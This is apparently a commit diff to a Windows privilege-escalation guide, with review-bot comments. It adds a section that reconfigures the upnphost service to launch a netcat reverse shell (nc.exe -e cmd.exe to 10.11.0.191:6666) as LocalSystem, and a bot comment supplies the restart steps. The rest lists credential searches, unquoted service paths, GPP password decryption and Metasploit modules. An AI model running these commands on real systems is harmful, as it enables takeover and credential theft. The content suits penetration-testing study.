Commit 563d48f2 authored by bobloblaw

Updates privilege_escalation_windows.md

Auto commit by GitBook Editor
parent b67b154f
+41 −38
@@ -94,7 +94,6 @@ reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```


## Internal/Hidden Services

Sometimes there are services that are only accessible from inside the network. For example a MySQL server might not be accessible from the outside, for security reasons. It is also common to have different administration applications that is only accessible from inside the network/machine. Like a printer interface, or something like that. These services might be more vulnerable since they are not meant to be seen from the outside.
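Review bot: the retained paragraph under "Internal/Hidden Services" has an agreement error ("different administration applications that is only accessible" should read "that are only accessible") and "Like a printer interface, or something like that." is a sentence fragment; since this commit already touches the whitespace around this section, fold the grammar fix in here rather than leaving it for another pass.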
@@ -104,6 +103,7 @@ netstat -ano
```

Example output:

```
Proto  Local address      Remote address     State        User  Inode  PID/Program name
    -----  -------------      --------------     -----        ----  -----  ----------------
@@ -156,7 +156,6 @@ Just as in windows kernel exploits should be our last resource, since it might b
wmic qfe get Caption,Description,HotFixID,InstalledOn
```


### Python to Binary

If we have an exploit written in python but we don't have python installed on the victim-machine we can always transform it into a binary with pyinstaller. Good trick to know.
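Review bot: "last resource" in the kernel-exploit sentence should be "last resort", and the "Python to Binary" paragraph needs one caveat: PyInstaller does not cross-compile, so a Windows executable has to be built from a Windows Python installation (or under Wine), not on the Linux attack box, otherwise the reader ends up shipping an ELF to the target. One sentence saying so would save people the round trip.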
@@ -177,6 +176,16 @@ Yeah I know this ain't pretty, but it works. You can of course change the name S
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
```

## **Change the upnp service binary**
`
sc config upnphost binpath= "C:\Inetpub\nc.exe 10.11.0.191 6666 -e c:\Windows\system32\cmd.exe"`

`sc config upnphost obj= ".\LocalSystem" password= ""`

`sc config upnphost depend= ""`

## 

## Weak Service Permissions

Services on windows are programs that run in the background. Without a GUI.
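Review bot: the new "Change the upnp service binary" section is missing both its prerequisite and its trigger. `sc config` only succeeds when the current user holds SERVICE_CHANGE_CONFIG on upnphost, which is exactly the condition the "Weak Service Permissions" section below teaches the reader to test for, so the text should state that and the section should probably sit under that heading instead of standing alone; and nothing here restarts the service, so after the three `sc config` lines add `sc stop upnphost` and `sc start upnphost` (plus `sc qc upnphost` to confirm BINARY_PATH_NAME and SERVICE_START_NAME actually changed). Formatting points in the same hunk: the heading wraps its text in bold inside `##`, unlike every other heading on the page; the first command is wrapped in a single backtick that opens on one line and closes on the next instead of the triple-backtick fence the rest of the file uses; `10.11.0.191 6666` and `C:\Inetpub\nc.exe` are one engagement's values and should be marked as placeholders for the listener and the dropped binary; and the empty `## ` heading that follows the commands should be deleted.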
@@ -222,10 +231,9 @@ Now you can process them one by one with the cacls command.
cacls "C:\path\to\file.exe"
```


### Look for Weakness

What we are interested in is binaries that have been installed by the user. In the output you want to look for **BUILTIN\Users:(F)**. Or where your user/usergroup has **(F)** or **(C)** rights.
What we are interested in is binaries that have been installed by the user. In the output you want to look for **BUILTIN\Users:\(F\)**. Or where your user/usergroup has **\(F\)** or **\(C\)** rights.

Example:

@@ -281,7 +289,7 @@ wmic process list brief | find "winlogon"

So when you get the shell you can either type **migrate PID** or automate this so that meterpreter automatically migrates.

http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html
[http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html](http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html)

## Unquoted Service Paths

@@ -317,9 +325,9 @@ c:\program.exe
When the program is restarted it will execute the binary **program.exe**, which we of course control. We can do this in any directory that has a space in its name. Not only program files.

This attack is explained here:  
http://toshellandback.com/2015/11/24/ms-priv-esc/
[http://toshellandback.com/2015/11/24/ms-priv-esc/](http://toshellandback.com/2015/11/24/ms-priv-esc/)

There is also a metasploit module for this is: exploit/windows/local/trusted_service_path
There is also a metasploit module for this is: exploit/windows/local/trusted\_service\_path

## Vulnerable Drivers

@@ -337,7 +345,7 @@ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevat
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
```

http://toshellandback.com/2015/11/24/ms-priv-esc/
[http://toshellandback.com/2015/11/24/ms-priv-esc/](http://toshellandback.com/2015/11/24/ms-priv-esc/)

## Group Policy Preference

@@ -375,7 +383,6 @@ If we find the file with a password in it, we can decrypt it like this in Kali
gpp-decrypt encryptedpassword
```


```
Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
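Review bot: the fenced list of `*.xml` paths (`Services\Services.xml`, `ScheduledTasks\ScheduledTasks.xml`, ...) lands right after the `gpp-decrypt` example with no lead-in, so a reader has no idea what "Element-Specific Attributes" or "Task Inner Element" refer to. Add one sentence in front of the fence saying these are the Group Policy Preference XML files under the domain SYSVOL share in which a `cpassword` attribute can appear, and that the column after the colon is where in each file the attribute lives; that turns the block from a paste into something the reader can grep for.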
@@ -384,7 +391,6 @@ Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes
```


## Escalate to SYSTEM from Administrator

### On Windows XP and Older
@@ -421,7 +427,6 @@ vdmallowed.exe
vdmexploit.dll
```


## Using Metasploit

So if you have a metasploit meterpreter session going you can run **getsystem**.
@@ -434,7 +439,6 @@ exploit/windows/local/trusted_service_path

### Post modules


First you need to background the meterpreter shell and then you just run the post modules.  
You can also try some different post modules.

@@ -460,18 +464,17 @@ run post/windows/gather/enum_logged_on_users
run post/windows/gather/checkvm
```


## References

[http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/](http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/)  
[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)  
[https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/](https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/)  
[http://it-ovid.blogspot.cl/2012/02/windows-privilege-escalation.html](http://it-ovid.blogspot.cl/2012/02/windows-privilege-escalation.html)  
[https://github.com/gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz)  
[http://bernardodamele.blogspot.cl/2011/12/dump-windows-password-hashes.html](http://bernardodamele.blogspot.cl/2011/12/dump-windows-password-hashes.html)  
[https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be](https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be)  
[https://www.youtube.com/watch?v=PC\_iMqiuIRQ](https://www.youtube.com/watch?v=PC_iMqiuIRQ)  
[http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/](http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/)  
[https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)  
[http://pwnwiki.io/\#!privesc/windows/index.md](http://pwnwiki.io/#!privesc/windows/index.md)
http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/
http://www.fuzzysecurity.com/tutorials/16.html
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
http://it-ovid.blogspot.cl/2012/02/windows-privilege-escalation.html
https://github.com/gentilkiwi/mimikatz
http://bernardodamele.blogspot.cl/2011/12/dump-windows-password-hashes.html
https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be
https://www.youtube.com/watch?v=PC_iMqiuIRQ
http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
http://pwnwiki.io/#!privesc/windows/index.md
 No newline at end of file
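Review bot: replacing the markdown links with bare URLs also dropped the two trailing spaces that ended each line, so in standard markdown these eleven references now render as one run-together paragraph unless the renderer both autolinks and soft-breaks (GitBook does, GitHub does not). Make the list robust by prefixing each URL with `- `, or keep the explicit `[url](url)` form with hard line breaks. This change also introduces the "No newline at end of file" condition; add the trailing newline so the next diff of this file stays clean.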